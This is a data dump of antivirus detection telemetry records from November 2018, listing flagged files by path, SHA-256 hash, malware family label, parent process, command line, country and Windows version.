  Row(detection=Row(filename='f3cfd7f6516e2c231ad181d973b0d0f910ef8455fea9b8634faabe7a6b7859a5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\F3CFD7F6516E2C231AD181D973B0D0F910EF8455FEA9B8634FAABE7A6B7859A5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f3cfd7f6516e2c231ad181d973b0d0f910ef8455fea9b8634faabe7a6b7859a5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='semstat.exe', filepath='G:\\دورة صيانة 2017\\imie tool\\IMEI CHANGER\\IMEI Write allwinner A10,A13\\AutoPlay\\Docs\\Dragonface-V10\\CPFOP\\bin\\semstat.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='f3e9e23e2dc5db15bd28a107a1a7ae7276e7fbb796641d372c7bdd89d2464a02', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\mshta.exe', parentsize=13312, timestamp='2018-11-01T13:05:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\品質管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='f418c582b9729b1097ce8bfce8d2f5fe2e8cf3c6f71e9108973ccbf839f7ac1e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f45ff775783693214a5454f7d42964328450c655c1e295a27f9ebf608767db24', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F45FF775783693214A5454F7D42964328450C655C1E295A27F9EBF608767DB24', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='f45ff775783693214a5454f7d42964328450c655c1e295a27f9ebf608767db24', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:40:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='debuginfocollector.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Genieo\\Application\\Engine\\bin\\debugInfoCollector.exe', filesize=28000, name='Adware/Genieo.28000.#M1.#R1'), hash='f471175643810b674a21d4d2c123e134e10a7d0edf56f3913078ff6c5072e2d9', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='concept note v300518.exe', filepath='f:\\\xa0\\philipin\\Concept Note v300518.exe', filesize=1920000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='f47bf29effd2941b7d51f4a41c72795a1a508cbd1622e02ed72308f22944bf8f', metadata=Row(cmdline=None, country='LA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:14:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='f48853db0920f2515eebea04252dadc15c91b23f9dfbb15f27d96e379c0f7d2d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-01T17:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f48cc37dfee4705a56c224430b8bf84c3e6994dc14ff535bccfb69887b240639', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\F48CC37DFEE4705A56C224430B8BF84C3E6994DC14FF535BCCFB69887B240639', filesize=256000, name='W32/Sivis.A.#M1.#R1'), hash='f48cc37dfee4705a56c224430b8bf84c3e6994dc14ff535bccfb69887b240639', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T06:01:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f48cc37dfee4705a56c224430b8bf84c3e6994dc14ff535bccfb69887b240639', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-16.categorizing\\F48CC37DFEE4705A56C224430B8BF84C3E6994DC14FF535BCCFB69887B240639', filesize=256000, name='W32/Sivis.A.#M1.#R1'), hash='f48cc37dfee4705a56c224430b8bf84c3e6994dc14ff535bccfb69887b240639', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:38:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f4a73fec983d82ba9d05da36e4b47ec223655196e048c7606eddd8e3b62e5f4c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\F4A73FEC983D82BA9D05DA36E4B47EC223655196E048C7606EDDD8E3B62E5F4C', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='f4a73fec983d82ba9d05da36e4b47ec223655196e048c7606eddd8e3b62e5f4c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T06:01:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='f4cc3eca8cdd26da06dcc3556a396864fc26045630c69cca2a579c95ddece541', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:31:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093227-e84220f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc35c57\\AVSCAN-20181101-093217-E24BBF42\\AVSCAN-20181101-093227-E84220F4', filesize=33792000, name='HEUR/AGEN.1002644.#M1.#R1'), hash='f4e236b5392c3d02c5f15073254a467e3a51e8530ca4e87d4b668d58f13c7d09', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:32:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f515e2f31bf3fef5121beb134c8fabdaa917ec78caf029e4fcb9faec68ee1d2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F515E2F31BF3FEF5121BEB134C8FABDAA917EC78CAF029E4FCB9FAEC68EE1D2F', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='f515e2f31bf3fef5121beb134c8fabdaa917ec78caf029e4fcb9faec68ee1d2f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:40:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f53e8a1b34fc371db67eab9a8701ad956b9134e986687454c1725e378f73b8df', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kies.exe', filepath='C:\\Users\\X\\Downloads\\Samsung Kies\\Kies.exe', filesize=39360000, name='HEUR/AGEN.1007165.#M1.#R1'), hash='f57e448afcf57d849aab38b10e44ae5feaeac073fb51829bd5445f8644a96d5e', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:11:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kies.exe', filepath='C:\\Users\\X\\Downloads\\Samsung Kies\\Kies.exe', filesize=39360000, name='HEUR/AGEN.1007165.#M1.#R1'), hash='f57e448afcf57d849aab38b10e44ae5feaeac073fb51829bd5445f8644a96d5e', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:11:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='I:\\Program Files\\SPT\\Driver\\Samsung Agere GSM USB Driver Ver 4.20\\agsm_v4_20\\Setup.exe', filesize=2560000, name='W32/Ramnit.C.#M1.#R1'), hash='f5c5e86e3b9f64728e9252559049ba571d49a68e0a6edf959fd20927a2ec652c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:00:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftx global vector configuration tool.exe', filepath='\\\\?\\E:\\Program Files (x86)\\Steam\\steamapps\\common\\FSX\\ORBX\\FTX_VECTOR\\FTX GLOBAL VECTOR Configuration Tool.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftx global vector configuration tool - copyx - copy2 - copy (3).exe', filepath='c:\\program files (x86)\\microsoft games\\microsoft flight simulator x\\orbx\\ftx_vector\\ftx global vector configuration tool - copyx - copy2 - copy (3).exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:05:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220619-7a435251', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a2e2de0\\AVSCAN-20181101-220557-765D7EF6\\AVSCAN-20181101-220619-7A435251', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:06:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221144-b4df79de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a2e2de0\\AVSCAN-20181101-221128-B20033AA\\AVSCAN-20181101-221144-B4DF79DE', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:11:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftx global vector configuration tool - - copy.exe', filepath='c:\\program files (x86)\\microsoft games\\microsoft flight simulator x\\orbx\\ftx_vector\\ftx global vector configuration tool - - copy.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:11:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftx global vector configuration tool.exe', filepath='\\\\?\\E:\\Program Files (x86)\\Steam\\steamapps\\common\\FSX\\ORBX\\FTX_VECTOR\\FTX GLOBAL VECTOR Configuration Tool.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194723-8716d13a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b830c03\\AVSCAN-20181101-194653-82E83AD1\\AVSCAN-20181101-194723-8716D13A', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='f60a2da65941cc9bc9c0d168daa87a47ab390e8a1ab0e19ac3ea945d8e06c8a5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f612da637c2f256a08b72b65265240ed835766c19da1bbb82a86e76fd8a43b53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F612DA637C2F256A08B72B65265240ED835766C19DA1BBB82A86E76FD8A43B53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f612da637c2f256a08b72b65265240ed835766c19da1bbb82a86e76fd8a43b53', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F625D34E7133D32BE2A1A1D977F33E34D4757933BADFDDE3834B86EA78986422', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:41:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:34:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:44:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:35:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:33:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:17:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:38:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:39:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:39:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:43:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:44:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:37:41Z'), dt=datetime.date(2018, 11, 1)),
